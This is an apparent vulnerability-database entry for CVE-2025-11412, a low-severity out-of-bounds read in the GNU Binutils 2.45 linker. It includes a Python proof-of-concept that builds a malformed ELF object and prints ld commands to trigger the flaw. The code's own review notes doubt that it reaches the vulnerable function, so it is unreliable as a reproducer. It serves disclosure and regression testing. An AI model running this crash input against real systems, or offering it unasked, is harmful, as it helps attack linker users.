Security Vulnerability Report
CVE-2025-11412 CVSS 3.3 LOW

CVE-2025-11412

Published: 2025-10-07 22:15:34
Last Modified: 2026-05-12 13:16:29

Description

A vulnerability has been found in GNU Binutils 2.45. This impacts the function bfd_elf_gc_record_vtentry of the file bfd/elflink.c of the component Linker. The manipulation leads to out-of-bounds read. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. The identifier of the patch is 047435dd988a3975d40c6626a8f739a0b2e154bc. To fix this issue, it is recommended to deploy a patch.

CVSS Details

CVSS Score
3.3
Severity
LOW
CVSS Vector
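CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L (this is the Secondary-source score; the Primary CVSS 3.1 entry in the raw JSON below is 5.5 MEDIUM, CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)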

Configurations (Affected Products)

cpe:2.3:a:gnu:binutils:2.45:*:*:*:*:*:*:* - VULNERABLE
GNU Binutils 2.45
GNU Binutils < 2.45 (possibly affected)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
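#!/usr/bin/env python3
"""Build the malformed ELF object published as a CVE-2025-11412 test case.

The advisory describes an out-of-bounds read in bfd_elf_gc_record_vtentry
(bfd/elflink.c) in the GNU Binutils 2.45 linker, fixed by commit
047435dd988a3975d40c6626a8f739a0b2e154bc.  This script writes a small ELF64
relocatable file whose only payload is a .gnu.version_d (verdef) record with
vd_ndx set to 0xFFFF.

Intended use is regression testing: feed the output to a linker build that
contains the fix (ideally one built with AddressSanitizer) and confirm that
the file is rejected or processed without a memory-safety report.

NOTE(review): the generated file contains only a string table and a verdef
section.  Nothing on the page shows that this input reaches the function
named in the advisory; confirm against the reproducer attached to the
upstream bug report before relying on it as a test.
"""
import struct
import sys

# ELF64 identification and header constants.
ELFMAG = b'\x7fELF'
ELFCLASS64 = 2
ELFDATA2LSB = 1
EV_CURRENT = 1
ET_REL = 1  # Relocatable file
EM_X86_64 = 62

# Section types.  SHT_SYMTAB, SHT_GNU_verneed and SHT_GNU_versym are defined
# for completeness; the generated file does not use them.
SHT_SYMTAB = 2
SHT_STRTAB = 3
SHT_GNU_verdef = 0x6ffffffd
SHT_GNU_verneed = 0x6ffffffe
SHT_GNU_versym = 0x6fffffff

# Fixed on-disk sizes of the ELF64 file header and of one section header.
EHDR_SIZE = 64
SHDR_SIZE = 64


def pack_elf64_ehdr(e_type, e_shoff, e_shnum, e_shstrndx):
    """Pack a minimal little-endian ELF64 file header (64 bytes).

    Args:
        e_type: ELF object type, e.g. ET_REL.
        e_shoff: File offset of the section header table.
        e_shnum: Number of section headers.
        e_shstrndx: Index of the section-name string table section.

    Returns:
        The packed header as bytes.  The machine is fixed to EM_X86_64 and
        the file has no program headers.
    """
    return struct.pack(
        '<4sBBBBB7sHHIQQQIHHHHHH',
        ELFMAG,        # e_ident[EI_MAG]
        ELFCLASS64,    # e_ident[EI_CLASS]
        ELFDATA2LSB,   # e_ident[EI_DATA]
        EV_CURRENT,    # e_ident[EI_VERSION]
        0,             # e_ident[EI_OSABI]
        0,             # e_ident[EI_ABIVERSION]
        b'\x00' * 7,   # e_ident padding
        # The published version ignored this argument and always wrote
        # ET_REL; the only caller passes ET_REL, so output is unchanged.
        e_type,        # e_type
        EM_X86_64,     # e_machine
        EV_CURRENT,    # e_version
        0,             # e_entry
        0,             # e_phoff
        e_shoff,       # e_shoff
        0,             # e_flags
        EHDR_SIZE,     # e_ehsize
        0,             # e_phentsize
        0,             # e_phnum
        SHDR_SIZE,     # e_shentsize
        e_shnum,       # e_shnum
        e_shstrndx,    # e_shstrndx
    )


def pack_elf64_shdr(sh_name, sh_type, sh_flags, sh_addr, sh_offset,
                    sh_size, sh_link, sh_info, sh_addralign, sh_entsize):
    """Pack one little-endian ELF64 section header (64 bytes).

    The arguments are the Elf64_Shdr fields in declaration order; sh_name is
    a byte offset into the section-name string table, not an index.
    """
    return struct.pack(
        '<IIQQQQIIQQ',
        sh_name, sh_type, sh_flags, sh_addr, sh_offset,
        sh_size, sh_link, sh_info, sh_addralign, sh_entsize,
    )


def create_malformed_elf(output_path):
    """Write the malformed ELF object for CVE-2025-11412 to output_path.

    File layout: [ELF header][.shstrtab data][verdef data][section headers].
    The bytes written are the same as in the published script.

    Args:
        output_path: Path of the file to create (overwritten if it exists).
    """
    # Section header string table.
    shstrtab = b'\x00.symtab\x00.shstrtab\x00.gnu.version_d\x00.gnu.version\x00'

    # Elf_Verdef: vd_version(2), vd_flags(2), vd_ndx(2), vd_cnt(2),
    #             vd_hash(4), vd_aux(4), vd_next(4)  -> 20 bytes.
    verdef_entry = struct.pack(
        '<HHHHIII',
        1,        # vd_version
        0,        # vd_flags
        0xFFFF,   # vd_ndx: the out-of-range version index this sample relies on
        1,        # vd_cnt
        0,        # vd_hash
        20,       # vd_aux: offset from this record to its first Verdaux
                  #         (20 is the size of the Verdef record itself)
        0,        # vd_next (0 = last record)
    )

    # Elf_Verdaux: vda_name(4), vda_next(4)
    verdaux_entry = struct.pack('<II', 1, 0)

    verdef_data = verdef_entry + verdaux_entry

    shstrtab_offset = EHDR_SIZE
    verdef_offset = shstrtab_offset + len(shstrtab)
    shdr_offset = verdef_offset + len(verdef_data)

    # Round the section header table up to an 8-byte boundary.  The pad bytes
    # are appended to verdef_data, so they are counted in that section's
    # sh_size below (kept as published).
    misalign = shdr_offset % 8
    if misalign:
        padding = 8 - misalign
        verdef_data += b'\x00' * padding
        shdr_offset += padding

    # Section indices: 0=NULL, 1=.shstrtab, 2=.gnu.version_d
    e_shnum = 3
    e_shstrndx = 1

    ehdr = pack_elf64_ehdr(ET_REL, shdr_offset, e_shnum, e_shstrndx)

    # NOTE(review): sh_name is an offset into shstrtab.  Offset 1 is the start
    # of ".symtab" and offset 17 falls inside ".shstrtab", so tools such as
    # readelf will show names that differ from the index comment above.
    # Values are kept as published.
    shdr_null = pack_elf64_shdr(0, 0, 0, 0, 0, 0, 0, 0, 0, 0)
    shdr_shstrtab = pack_elf64_shdr(
        1, SHT_STRTAB, 0, 0, shstrtab_offset, len(shstrtab), 0, 0, 1, 0)
    shdr_verdef = pack_elf64_shdr(
        17, SHT_GNU_verdef, 0, 0, verdef_offset, len(verdef_data), 0, 0, 4, 0)

    with open(output_path, 'wb') as f:
        f.write(b''.join((
            ehdr,
            shstrtab,
            verdef_data,
            shdr_null,
            shdr_shstrtab,
            shdr_verdef,
        )))

    print(f"[*] Malformed ELF file created: {output_path}")
    print(f"[*] Run: ld -r {output_path} -o /dev/null")
    print(f"[*] Or: ld {output_path} /lib/x86_64-linux-gnu/crt1.o ...")


if __name__ == '__main__':
    output = sys.argv[1] if len(sys.argv) > 1 else 'poc_elf.o'
    create_malformed_elf(output)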

References

Raw JSON Data

{"cve": {"id": "CVE-2025-11412", "sourceIdentifier": "[email protected]", "published": "2025-10-07T22:15:34.030", "lastModified": "2026-05-12T13:16:28.520", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been found in GNU Binutils 2.45. This impacts the function bfd_elf_gc_record_vtentry of the file bfd/elflink.c of the component Linker. The manipulation leads to out-of-bounds read. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. The identifier of the patch is 047435dd988a3975d40c6626a8f739a0b2e154bc. To fix this issue, it is recommended to deploy a patch."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.9, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", 
"modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "baseScore": 3.3, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:L/AC:L/Au:S/C:N/I:N/A:P", "baseScore": 1.7, "accessVector": "LOCAL", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "PARTIAL"}, "baseSeverity": "LOW", "exploitabilityScore": 3.1, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-125"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": 
"CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gnu:binutils:2.45:*:*:*:*:*:*:*", "matchCriteriaId": "60CBCA58-29DE-4A0A-BAF0-D0188FAF4884"}]}]}], "references": [{"url": "https://sourceware.org/bugzilla/attachment.cgi?id=16378", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://sourceware.org/bugzilla/show_bug.cgi?id=33452", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://sourceware.org/bugzilla/show_bug.cgi?id=33452#c8", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://sourceware.org/git/gitweb.cgi?p=binutils-gdb.git;h=047435dd988a3975d40c6626a8f739a0b2e154bc", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://vuldb.com/?ctiid.327348", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.327348", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https: ... (truncated)